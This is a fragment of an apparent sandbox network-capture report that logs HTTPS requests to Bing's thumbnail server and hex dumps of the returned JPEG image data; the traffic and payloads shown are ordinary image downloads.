                                                                          2024-12-08 19:51:17 UTC16384INData Raw: 2d 26 c7 fb 36 7b 55 6b bf b4 a2 4c 8c bf 31 fb cd b8 73 fc 5d 6b b6 f8 a7 a9 4f a5 68 f6 f6 2d 77 3f 97 15 de df 9d fc a9 ed 6e 42 f0 cb b0 7e f1 76 b5 4d 1e 8b 67 17 88 2c 66 d5 2e ee 95 a5 db 22 5e 7d aa 3f 9d 93 fe 59 f9 7f c0 a3 df f3 ae 6f e2 b6 b7 a8 58 5a ea 3a 3d f7 9f aa 5a b5 a7 9b 14 c9 03 32 d9 b0 fb ad dc a1 ec 4e 76 d7 9b 4e b4 33 8c c2 85 a2 bd d5 76 b6 bd dd b4 6e fb 5f 66 d3 e9 e4 74 d3 a7 c9 4e a7 33 fe af b1 d6 e8 fa f4 5a df 88 2e 34 18 e3 fb 55 8d aa 6e ff 00 8f ad cc ed fe cb 70 fc d4 5f 62 d0 d7 4a 7f 08 da db a2 c2 de 67 d9 9d 11 7c d8 5b ef 67 7f 5d df ef 7d 2b 82 f0 5c 3a 7e 8d a6 da 78 a1 b5 37 5b eb a8 7c ab bf 36 7f 97 e7 6c 89 17 23 3f 2a fe 0d d8 e6 ae 78 bd bf b3 3c 54 91 c3 71 74 d6 3a a5 8a ac db d3 6b 3b 37 39 55 f4 6e
                                                                          Data Ascii: -&6{UkL1s]kOh-w?nB~vMg,f."^}?YoXZ:=Z2NvN3vn_ftN3Z.4Unp_bJg|[g]}+\:~x7[|6l#?*x<Tqt:k;79Un
                                                                          2024-12-08 19:51:18 UTC16067INData Raw: b7 af db 91 13 76 c9 87 dd 1d f7 67 3d fe e9 ac 6d 5b c3 6d 71 e2 6d 7a d6 f9 2d 1b 52 bc bb 5f b3 dc 5c a7 fc b3 48 fe 42 a8 ad fc 4c aa 73 f9 83 5d ad d5 8d a5 df 88 26 58 ff 00 75 a8 35 a3 2c 2e 8e de 44 df 2f ee d8 ff 00 7c fd e5 cf fb 35 ca 6b d6 13 db 6b 93 6a 4d 77 25 c4 d6 b6 ec be 4c c8 bb be 4f ba 71 fd ec d7 46 5d 8a 9a 8a 85 3a 9c ad 47 48 db ab 7c ca cd 74 e9 ae 8d 25 73 6a 91 6e 3b 9a 53 58 40 96 b6 97 17 50 79 b7 56 b3 46 be 4b ce b1 6f 91 e3 77 65 54 6e 1b e6 da 7f dd ab 3e 24 ba 5d 47 c3 0f 0d d4 12 2c 29 ab c1 f6 1f 27 e5 d8 c1 4e ef 97 fb bf 4c 7a d7 9a 6b 92 cb 75 f0 e5 ed f4 bb b9 de de ce ee 4b 99 b7 a2 b6 fc af de 3f 4a d3 f8 6f a9 ea 1a 25 ac 2d a8 47 05 af db 1d 57 ca 87 ef 79 61 78 6d bf de e5 bb f4 ae e9 64 b5 63 49 57 e7 e6 9c
                                                                          Data Ascii: vg=m[mqmz-R_\HBLs]&Xu5,.D/|5kkjMw%LOqF]:GH|t%sjn;SX@PyVFKoweTn>$]G,)'NLzkuK?Jo%-GWyaxmdcIW
                                                                          2024-12-08 19:51:18 UTC16384INData Raw: 3c df 9f fd 6c d8 ff 00 74 7f 3a c3 b8 78 1a 48 6e 26 9f 76 e7 dc 89 0a 6d 5d a3 a7 6a 54 26 a7 07 0e 5f 7b bf 5f 40 92 f7 af 7d 09 3c 45 79 1d c7 ee ee 3e d5 14 db 3c dd f6 ff 00 37 b7 cf 57 bc 3b 72 b7 1a 6d f4 96 ff 00 bd 55 87 ca d9 b1 bf 7c df af 4a c5 92 f2 f3 cf 9a de 3f 33 c9 9e 6d b0 bb fd dd c7 e6 fb d5 7b 4f 78 34 48 12 66 fd ec 71 6e 57 d9 ef fa 7b d6 98 8a 29 61 95 28 ab cb a2 df b5 c5 17 79 df a1 d5 c3 a1 2b 78 7e e2 e1 b5 2f f4 89 51 65 48 5e 0d bf bc 4c 6e 55 eb fd e6 c7 f9 c4 1e 15 f1 3d 8e 97 1b df 34 ff 00 68 b8 58 76 a6 c4 f9 b7 6d 70 3a fe 55 4f 5c f1 0c bf f0 8a a5 c4 70 6a ab 33 4c ab 6f 71 b3 6a ba ed f9 b3 fd f6 c7 6f c7 ad 71 7a 6c ab 06 c9 17 cf f2 d7 ee 6f 4d ad f7 ab 83 03 92 d5 c7 61 ea fd 71 bb 37 a2 d3 a5 b4 ba 5b 6d e6 74
                                                                          Data Ascii: <lt:xHn&vm]jT&_{_@}<Ey><7W;rmU|J?3m{Ox4HfqnW{)a(y+x~/QeH^LnU=4hXvmp:UO\pj3LoqjoqzloMaq7[mt
                                                                          2024-12-08 19:51:18 UTC16384INData Raw: ed 8e cd 16 d7 50 0e 03 71 d7 fd 95 fb d5 4f 54 d1 e5 d6 74 df 27 fe 5f ac ed fc bb 1d 8e cb e7 7c d9 c3 67 bf ff 00 58 55 cd 06 e2 29 64 86 ce de 78 da d5 bc b6 b8 7d f2 6e ff 00 69 77 e3 ee fd 45 6d d8 cf fd 9d ac b3 32 6e 5b 74 58 b6 7c cd ff 00 d9 32 86 e9 dc 76 35 f3 d5 31 32 c1 5b d8 c6 d3 8e b7 d6 ef 5e a9 fd cd 76 67 6d 0a 5c ea ed 1e 67 0e ae da 76 8f 71 63 0c 9f 67 b8 96 68 f7 fc ed e6 a3 0e 72 2b ab f0 6e b9 05 e5 8a 69 b2 4f 3c b3 2d a4 8a f3 6f 66 d9 bd bf 8f fb b8 db ef 5d a7 8d f4 3d 33 c5 d1 b6 d8 e0 fb 47 cb b2 e6 54 db 3f 2b d3 76 3e 6f f8 15 78 fd e6 9d ab f8 57 52 9a 16 8e 48 a6 fd e6 cb 8d 9b 5a 65 fe 47 e9 5e ce 13 19 80 cf f0 f2 a6 e3 ec eb df 9a cd f5 b5 ae 9d b5 5e 46 75 29 ce 9c 93 b5 e3 dc ed ee 2e ed 75 4b a4 be 9a 08 ef 6d ed
                                                                          Data Ascii: PqOTt'_|gXU)dx}niwEm2n[tX|2v512[^vgm\gvqcghr+niO<-of]=3GT?+v>oxWRHZeG^^Fu).uKm


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          51192.168.2.449813150.171.27.10443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:16 UTC346OUTGET /th?id=OADD2.10239402414374_1RZXN1BFTHNSAZBQY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                          Host: tse1.mm.bing.net
                                                                          Connection: Keep-Alive
                                                                          2024-12-08 19:51:17 UTC861INHTTP/1.1 200 OK
                                                                          Cache-Control: public, max-age=2592000
                                                                          Content-Length: 505458
                                                                          Content-Type: image/jpeg
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Headers: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Timing-Allow-Origin: *
                                                                          Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                          NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                          X-Cache: CONFIG_NOCACHE
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          X-MSEdge-Ref: Ref A: 15716C72C2714D7185B7208E2C079110 Ref B: EWR30EDGE0813 Ref C: 2024-12-08T19:51:17Z
                                                                          Date: Sun, 08 Dec 2024 19:51:16 GMT
                                                                          Connection: close
                                                                          2024-12-08 19:51:17 UTC4027INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 f4 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 3a 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 ac 87 69 00 04 00 00 00 01 00 00 00 c0 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 36 2e 31 20 28 32 30 32 34 31 31 30 33 2e 6d 2e 32 38 33 34 20 31 34 64 33 65 37 34 29 20 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 31 31 3a 31 31 20 31 34 3a 34 30 3a 34 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00
                                                                          Data Ascii: JFIFHHExifMM*bj(1:r2i``Adobe Photoshop 26.1 (20241103.m.2834 14d3e74) (Windows)2024:11:11 14:40:438
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 8c 53 d4 7b 50 03 71 ed 4b 8a 5a 5c 50 02 52 ad 00 52 ad 03 b0 a0 66 95 47 b5 0a 28 a0 41 4e 51 4a b4 b4 00 52 28 a5 c7 b5 2e 28 1a 0c 52 e3 da 8a 5c 66 81 82 8a 5c 7b 52 e2 96 80 13 14 b4 63 da 95 45 05 02 8a 5a 29 d8 f6 a0 06 d2 f4 a7 62 8c 50 02 d2 62 96 95 68 01 31 ed 4b 8a 5c 7b 52 a8 a0 04 51 4e 51 42 8a 72 8a 00 4c 52 a8 a7 52 2d 02 61 8a 31 4b 4a b4 0c 4c 7b 52 e2 97 1e d4 f5 14 00 8a 28 c7 b5 2e 29 71 ed 4a e5 0d c7 b5 18 f6 a7 e2 92 98 98 28 a1 85 2a d2 d0 21 b4 63 da 9d 45 05 09 8a 5a 46 a4 a0 4c 28 a6 d3 a8 10 51 45 19 f7 a0 05 c5 2d 22 9a 4e b4 00 ea 55 a4 a7 67 de 81 d8 29 d4 dc fb d2 ad 03 16 8a 28 a4 c0 28 a2 8a 40 14 b8 a4 a7 53 b8 05 3a 8a 45 a4 02 d1 45 14 ee 01 45 14 ec 7b 52 01 31 49 52 51 40 11 d3 b1 ed 4b 8a 55 a0 68 6d 18 f6 a7 51
                                                                          Data Ascii: S{PqKZ\PRRfG(ANQJR(.(R\f\{RcEZ)bPbh1K\{RQNQBrLRR-a1KJL{R(.)qJ(*!cEZFL(QE-"NUg)((@S:EEE{R1IRQ@KUhmQ
                                                                          2024-12-08 19:51:17 UTC3634INData Raw: 49 4e a7 54 96 37 1e d4 63 da 97 14 62 82 5a 13 1e d4 28 a5 c5 2d 01 64 37 1e d4 53 b1 ed 42 d0 2b 0d c7 b5 18 f6 a7 62 8c 50 3e 54 36 9b 4f c5 1b 69 dc 4e 23 71 4b 8f 6a 5c 51 8a 2e 21 b8 a5 c7 b5 2e 28 c5 20 1b 8a 31 4e c5 1b 68 01 b8 a3 14 ec 51 8a a1 d8 66 3d a8 c7 b5 3b 1e d4 63 da 81 0c c5 18 a5 a2 80 13 14 62 9f 8f 6a 6e 3d a9 5c 06 30 a3 14 fc 7b 51 8f 6a 60 47 8f 6a 31 ed 4f c5 26 3d a8 01 b8 f6 a2 9d 8f 6a 4c 50 03 71 4b 8f 6a 76 3d a9 b4 00 98 a3 14 ec 62 8c 50 03 31 ed 4b 8a 5c 7b 52 e2 80 19 8f 6a 3e 94 fc 52 63 da 80 1b 8f 6a 31 ed 4e c7 b5 18 f6 a0 06 62 8c 53 f1 ed 49 8a 77 24 66 3d a8 c7 b5 3f 14 30 a6 03 31 ed 49 8a 7e 3d a8 c7 b5 00 33 14 53 f1 ed 45 2b 81 cb 63 34 b8 f6 a5 51 4b 8f 6a 64 ea 14 b8 a4 a7 28 a0 68 31 ed 4e 51 45 3b 1e d4
                                                                          Data Ascii: INT7cbZ(-d7SB+bP>T6OiN#qKj\Q.!.( 1NhQf=;cbjn=\0{Qj`Gj1O&=jLPqKjv=bP1K\{Rj>Rcj1NbSIw$f=?01I~=3SE+c4QKjd(h1NQE;
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 3e a5 4e f7 8b 39 fd 5b 49 bb 86 eb 8d 57 50 58 d9 57 74 6d 26 ee 7f 88 90 dc 8f d6 84 d2 ee 2d a6 92 f2 35 82 58 a0 ce d8 e5 8c 7e f8 67 6e 1b 07 a1 f5 15 d5 4d 69 26 b5 75 05 b5 c5 cb 34 50 28 0d 22 b2 1d de 83 3d f1 5a 5a ad bd 97 f6 1c af a7 6d 92 e2 35 f2 e3 db f2 b6 3f bd d8 83 ed 5c f5 31 5c 96 5d 4e ea 19 5a a8 dc ba 23 83 d2 74 9d 39 75 cb 98 2f 74 5b 95 8a 06 09 be d2 e4 ee 69 1b 9c e0 f6 f6 ce 7e b5 76 fa e7 c8 b8 8e 4d 2e fa 4b 95 83 e4 5f 35 42 ba bf 3f 2f b9 03 d7 15 b9 63 66 6d b4 bb 76 0c b3 f9 9f 3c b2 2f ca d9 3e bd 8e 3f 0a c8 d5 b4 cb 99 2e a7 d6 f4 c9 d7 ed 51 ae 24 8d 97 e5 90 63 92 47 f7 bd eb 8e 55 bd a4 f5 3d 48 e1 3d 8d 2f 75 6b f8 f7 e9 b9 cf df dd 5a ea 57 ce f7 b6 d1 47 24 92 66 6d ab b5 be be b5 8d e3 2f 0f 4f 0d f4 57 9a 05
                                                                          Data Ascii: >N9[IWPXWtm&-5X~gnMi&u4P("=ZZm5?\1\]NZ#t9u/t[i~vM.K_5B?/cfmv</>?.Q$cGU=H=/ukZWG$fm/OW
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 3d 5f c4 97 3a 35 ee 83 6d a5 dd cf 77 1e a1 73 18 16 cf 73 06 c4 ba 91 38 1f ec 96 24 12 30 41 21 b8 c8 e2 bc 52 5b c8 bc 2f e2 89 25 d0 ae 67 d0 e5 bb 72 93 c1 b7 cc b1 92 41 c3 a4 b0 b6 02 b7 d0 74 ec b5 6b c0 3f 18 6f b5 c8 fe c7 e2 57 b6 f9 a5 28 ae d8 d9 30 27 dc 05 61 bb fd d7 f7 6e 95 e8 13 68 c4 ea 13 ea d2 e9 f0 6b 1a 4d f2 a2 5d db 4f 89 2e 6d c2 f2 ac 8f c7 98 07 a3 61 b1 c7 15 6b 9f 05 37 0a ab 7f 3d 1f e8 63 1f 67 8f a7 1a 94 1e de 5a af d5 1e 35 f1 33 c2 96 7e 22 d4 a2 fe d3 b9 1a 1e a0 b1 ec 8f 62 f9 b6 7e bf ef a2 9e c3 9c 76 15 c1 6b df 0b fc 57 a4 2a c9 2d bc 32 c5 2f 30 4f 04 bb a1 b8 1e a9 27 dd fc 09 07 da be 81 f1 cf 87 ad e0 be 82 e7 4b fd d4 4a a5 e0 91 a7 de 8b 9e 8a ac df c2 7a 6c 6e 95 cf e8 f6 d2 5a c6 d3 3d a3 34 77 12 0f 3e
                                                                          Data Ascii: =_:5mwss8$0A!R[/%grAtk?oW(0'anhkM]O.mak7=cgZ53~"b~vkW*-2/0O'KJzlnZ=4w>
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 5d 9f fc 13 6a 38 95 38 de 26 e5 cd bd b3 42 d1 25 cc 0d 79 1e 64 58 9a 7d e8 c0 f5 1b 87 2a 0f b8 c0 fa 54 76 ea f3 59 c5 88 24 f3 38 f3 6d 1b 0c d1 8c 1e 54 77 1c 63 83 f8 57 21 75 a1 4f 34 cb 7b e1 bb c8 f5 85 d3 d7 c9 96 ca ef 3f 6a b7 8c e5 be 52 70 cc a3 91 cf 3e e6 af f8 4b 55 b2 87 ec c9 ae c1 25 9c f1 4a 24 b4 92 56 d8 9c ff 00 0f 9a 06 57 fe 05 f2 f6 ac e5 46 2a 37 4c e8 a7 88 93 95 9a b1 7b c4 b1 68 f7 16 31 c1 72 df 66 9a 06 3e 5f 98 a7 6b 6e ea 03 f4 1d 33 83 8c 57 9f 3d 8e a3 69 71 20 d4 2d 96 ea d6 46 c2 cf 06 3a 72 3b 73 5e b3 e2 ab 1b 88 e1 fb 7a 79 77 36 d3 2f 9d e6 47 f2 49 83 ea 33 8e 0e 47 51 cf 6a e5 6e 63 82 de ea 57 b7 96 08 84 f8 75 db 98 f6 c8 c0 7d e4 61 c1 3c 0f f0 3c d6 b4 24 b9 74 27 11 1e 67 73 ce bc 47 69 69 2e 9f 2a 0d d1
                                                                          Data Ascii: ]j88&B%ydX}*TvY$8mTwcW!uO4{?jRp>KU%J$VWF*7L{h1rf>_kn3W=iq -F:r;s^zyw6/GI3GQjncWu}a<<$t'gsGii.*
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: a5 4e ba 52 52 d2 db 68 da b7 dc 78 7f 8a 3c 1d e3 1f 86 17 8b af e9 57 6d 3d 9a f0 d7 90 2f dd 07 f8 66 8c e4 6d 3e bc 8a f4 5f 86 3f 14 ac 7c 55 a6 cb a5 6a 91 c7 6f a8 2c 5f bc 8b 77 ee ee 93 f8 8a 77 18 ee bc fb 57 67 25 cd dd b4 6b 6b 77 12 de 45 22 84 95 b6 8d ac 08 c1 ca 9e 08 f6 af 27 f8 97 e0 0f 0e a6 a4 ba 9f 86 ee db 47 ba 8d c9 55 8b e6 87 72 f5 c0 ea 84 7b 1f c2 bd a8 62 28 63 a3 ec f1 4a d3 e9 34 bf 3f eb ee 3e 5a ae 07 17 94 cd d5 c0 bb d2 7f 15 36 ff 00 26 ff 00 57 f3 67 9a ea d6 bf d9 7e 24 d4 34 e1 f3 43 1c ec 23 6f 6e df a5 7a 0f c2 5d 62 2b 58 60 82 46 f9 a5 66 12 7f 75 bd 2b 81 f1 3e 95 e2 1b 5d 51 ae 6f ed 9a 71 73 82 b3 c0 bb d2 4e 3f 4a a3 f6 dd 5a c7 69 8f cc b5 5f e1 57 8f 8f d4 57 d2 54 a2 ab d1 4a e9 dd 1f 17 84 c6 cb 03 89 94
                                                                          Data Ascii: NRRhx<Wm=/fm>_?|Ujo,_wwWg%kkwE"'GUr{b(cJ4?>Z6&Wg~$4C#onz]b+X`Ffu+>]QoqsN?JZi_WWTJ
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 19 a4 9f 49 2b 2d 1a 7d 5e 9b ab 76 6a da 3f 56 fd 97 3e 2b ff 00 c2 4b 1c 1e 0f d6 17 6e a1 0a 1f b0 ca bc 79 88 a0 b1 43 f4 ed 8f a7 a5 7b 5a 57 cd 3f b2 9f c3 ab b8 7e 25 5e 5c eb ba 3f da ed 34 bb 61 34 17 cb 72 44 4b 39 6c c6 c8 53 fd 61 3b 5b 8c f1 c9 3d 31 5f 4c a8 3d eb f5 9c 86 a4 ea 60 a3 27 2b c7 ec fa 1f 8b 71 25 28 d2 c6 da 51 e5 a9 f6 d7 f7 ae f5 f5 7b bf bf a8 63 da 8c 7b 53 b1 ed 49 8a f6 8f 00 4a 76 3d a8 51 4b 8a 90 13 1e d4 b8 a5 c5 18 f6 a0 76 13 14 62 97 1e d4 b8 a0 76 13 1e d4 51 45 00 18 f6 a3 14 53 b1 ed 40 0d c7 b5 18 f6 a7 63 da 8c 7b 50 2b 0d c7 b5 0d 4e a3 1e d4 0c 6d 26 29 d8 a3 14 0a c3 71 4b 8f 6a 5c 51 8a 04 37 14 62 9d 8a 31 40 0d c5 18 a7 62 91 85 05 0d a3 1e d4 ec 7b 51 45 c9 1b 45 3b 1e d4 53 b8 1c 5d 2a 8a 31 4a b5 b5
                                                                          Data Ascii: I+-}^vj?V>+KnyC{ZW?~%^\?4a4rDK9lSa;[=1_L=`'+q%(Q{c{SIJv=QKvbvQES@c{P+Nm&)qKj\Q7b1@b{QEE;S]*1J
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 89 f2 f7 f2 f6 d7 a5 4f 99 2e 64 f7 3c 3a de ca 72 54 a5 1d 51 5a 38 85 bd bc 88 17 6a b7 dd 6f ef 62 a6 b4 60 21 fb df f0 26 ab da 84 43 c9 61 b5 71 b6 b2 6d 8e 63 6f f6 6a 9e a8 9b 7b 39 24 5d d1 1f 7e b9 18 ed 23 6d ad e6 82 58 e3 6f f9 68 17 23 ee d7 3f 60 1a 3b e8 24 1f c3 20 ae bb 52 95 2d a3 8e 78 99 65 8e 75 ca fd 7b d7 2d 6d 5a 3d 3c 1d bd 9b b9 9b 6f 71 2c 73 6c 0b b4 ed fe e9 ff 00 f5 55 e3 71 21 8e 4f 36 2e 17 95 65 ce e5 ef cd 66 dc 6a d6 3e 62 f9 90 79 3f 36 1b 6f f8 55 9b 6b 9b 76 91 44 52 c6 db b8 56 5c 6d 6f fe bf b5 63 28 cb b1 d3 0a b1 bd 94 ae 59 d4 9c c7 67 6d 22 fc bb 98 f9 8a d8 65 eb 8f a8 a7 3b 8b 89 22 50 bc 6d c7 e5 eb 8a 6b 4f f6 8d b0 3a c6 cb b4 1d db 4b 7e 3c 55 0b 79 a4 86 36 73 bb 31 b7 ba af 5e c6 a7 97 43 47 51 27 e4 7b
                                                                          Data Ascii: O.d<:rTQZ8job`!&Caqmcoj{9$]~#mXoh#?`;$ R-xeu{-mZ=<oq,slUq!O6.efj>by?6oUkvDRV\moc(Ygm"e;"PmkO:K~<Uy6s1^CGQ'{
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 0a 9b 7e 48 94 7f b4 d9 ac 8e b5 24 91 b3 08 10 32 88 3f d5 c1 19 fa ab fa 83 de a8 3f ef 59 ad 1e 59 18 6d cb 37 1d 3a f4 a8 34 7b cf 36 ea 72 5b fd 62 85 55 fe b5 4e fe f2 e5 6f a5 77 fd dc 8b c7 ca bb 77 0a cb 5b 9b 5e 3c a8 e8 34 4f 25 b5 a8 ed c4 f2 2b 2b 7f 0a ed 56 18 c9 cf b1 e9 5a 77 d2 5d 3c cd 17 9b c4 99 da cc bf cf e9 58 1e 0d bf df aa 5c 8f 2b 6e e8 ff 00 77 b9 be ef 4e 2b 7a 69 ad 0c 71 cf 72 bf bc 56 3f 32 d7 15 6b f3 d8 f6 30 6e 3e c7 73 35 a1 bb 5b cd ef 3f ca aa 07 fb 35 06 a5 ab ca 23 f2 84 fb 83 71 f2 fc bd 6a c6 b1 7d 68 f6 6c d1 b4 91 b4 a9 bf 6b 46 76 fd 3f 1a e7 1a 62 ca b2 ed 5c b7 0d f4 a2 31 be e6 55 ea a8 bb 45 9a 56 b7 29 65 79 67 77 6f 3a f9 91 cc 3c cf 31 7b 1e 0d 76 76 da b8 bc d5 1b 4f b7 96 45 91 57 7f 9b b8 b4 6a 0f f0
                                                                          Data Ascii: ~H$2??YYm7:4{6r[bUNoww[^<4O%++VZw]<X\+nwN+ziqrV?2k0n>s5[?5#qj}hlkFv?b\1UEV)eygwo:<1{vvOEWj


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          52192.168.2.449811150.171.27.10443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:16 UTC375OUTGET /th?id=OADD2.10239402414375_1AVQBVS8V3X3ACPMA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                          Host: tse1.mm.bing.net
                                                                          Connection: Keep-Alive
                                                                          2024-12-08 19:51:17 UTC856INHTTP/1.1 200 OK
                                                                          Cache-Control: public, max-age=2592000
                                                                          Content-Length: 422551
                                                                          Content-Type: image/jpeg
                                                                          X-Cache: TCP_HIT
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Headers: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Timing-Allow-Origin: *
                                                                          Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                          NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          X-MSEdge-Ref: Ref A: D11FDDF3AB9D48FD81C768A2314B57C2 Ref B: EWR311000108051 Ref C: 2024-12-08T19:51:17Z
                                                                          Date: Sun, 08 Dec 2024 19:51:16 GMT
                                                                          Connection: close
                                                                          2024-12-08 19:51:17 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 f4 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 3a 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 ac 87 69 00 04 00 00 00 01 00 00 00 c0 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 36 2e 31 20 28 32 30 32 34 31 31 30 33 2e 6d 2e 32 38 33 34 20 31 34 64 33 65 37 34 29 20 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 31 31 3a 31 31 20 31 34 3a 34 30 3a 30 34 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00
                                                                          Data Ascii: JFIFHHExifMM*bj(1:r2i``Adobe Photoshop 26.1 (20241103.m.2834 14d3e74) (Windows)2024:11:11 14:40:04
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: 39 fc 00 a9 af bc 1b e2 5b 28 fc d5 b7 fb 64 7b 77 16 b3 6d c5 47 fb 4a 70 47 e4 6b d6 ab 2a 33 d1 4f f1 3e 76 85 1c 5d 24 a4 e8 e8 bc bf cb 53 b6 b6 b6 d7 93 49 f3 f4 cb db 5d 66 cb 6e e6 54 f9 b8 1c 7c c8 70 47 e1 59 f6 3a eb 69 5a 83 cb 69 69 36 9b 23 72 d1 c7 21 45 0c 0f 60 72 30 4f 62 31 5c 66 8d a8 de e9 f7 47 ec d7 52 db c8 b9 0e 99 2a c3 3c 10 41 c5 74 d6 da f3 de 32 41 7d 2a b9 7c 80 65 50 c0 93 d3 e6 ed ff 00 d7 af 3e 78 69 42 e9 ab af eb e4 7b 74 73 08 d4 49 c5 b8 c9 7c fe e7 ba 3b eb cd 56 4d 6f 4b f3 60 bb 87 ce 99 42 f9 64 96 8f 27 a9 0b 9c a1 fa 12 3e 94 f9 74 6b 5b bd 16 08 27 b2 bb ba bb b7 63 ba 78 41 79 80 3c e0 32 e1 d8 0e 3b 36 07 e7 5c 46 bc d7 1a 7d e4 17 51 59 4c 8a a0 36 eb 66 20 82 07 50 08 23 f0 e9 5d 7f 81 75 a7 d5 f4 bb a3 a7
                                                                          Data Ascii: 9[(d{wmGJpGk*3O>v]$SI]fnT|pGY:iZii6#r!E`r0Ob1\fGR*<At2A}*|eP>xiB{tsI|;VMoK`Bd'>tk['cxAy<2;6\F}QYL6f P#]u
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: a1 7c b6 77 ba 64 68 f1 b2 07 09 80 08 27 b1 ec 7b 8e d5 db 45 b5 1d 4f 2a bd 18 f3 69 a7 55 df fe 01 a5 a6 eb 02 de 41 6d 79 e5 42 e0 8f df 21 26 26 cf 4c 92 32 b9 f4 60 3f 1a d4 d5 2e 6f 20 f3 1e ca 38 d2 74 b5 75 2f e5 86 03 76 36 01 d7 00 9e 73 d0 0c 56 a6 9b a2 69 57 16 2b 3d a7 92 d3 34 45 65 88 80 72 ac 39 56 52 08 23 3d b0 41 ae 35 3c 3f ad e8 ba a3 2d 92 5c 33 42 4c 90 58 4a c5 a3 94 13 93 e4 48 79 8d 88 ec 49 53 8c 73 d0 71 f3 42 a4 9b 5a 35 d1 f5 3b 1f b5 a5 14 9a ba 7d 56 eb fc ff 00 3f 53 3a c3 59 b7 37 26 1b db 8b 8d 32 fb 7b 62 6f 2f 7c 12 31 3f 75 80 c3 46 41 e3 8c 8a 79 bd 10 dd 49 3e 81 3a c7 7c 5c 19 e3 24 79 57 4b dc 3a 74 39 e9 90 01 1e dd 69 6e 24 d2 7c 4f e7 90 5a 0b d8 d8 c5 74 b2 c7 b5 a1 70 31 fb e4 c0 23 1d 37 81 d0 72 2b 98 d1
                                                                          Data Ascii: |wdh'{EO*iUAmyB!&&L2`?.o 8tu/v6sViW+=4Eer9VR#=A5<?-\3BLXJHyISsqBZ5;}V?S:Y7&2{bo/|1?uFAyI>:|\$yWK:t9in$|OZtp1#7r+
